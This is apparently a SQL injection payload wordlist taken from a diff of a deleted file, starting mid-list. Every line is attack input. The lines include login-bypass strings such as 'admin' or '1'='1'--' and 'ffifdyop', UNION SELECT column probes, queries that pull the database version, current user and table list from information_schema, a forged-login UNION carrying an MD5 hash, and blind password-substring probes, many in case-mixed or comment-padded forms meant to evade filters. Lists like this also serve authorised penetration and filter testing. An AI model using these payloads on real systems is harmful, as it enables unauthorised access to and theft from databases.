")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
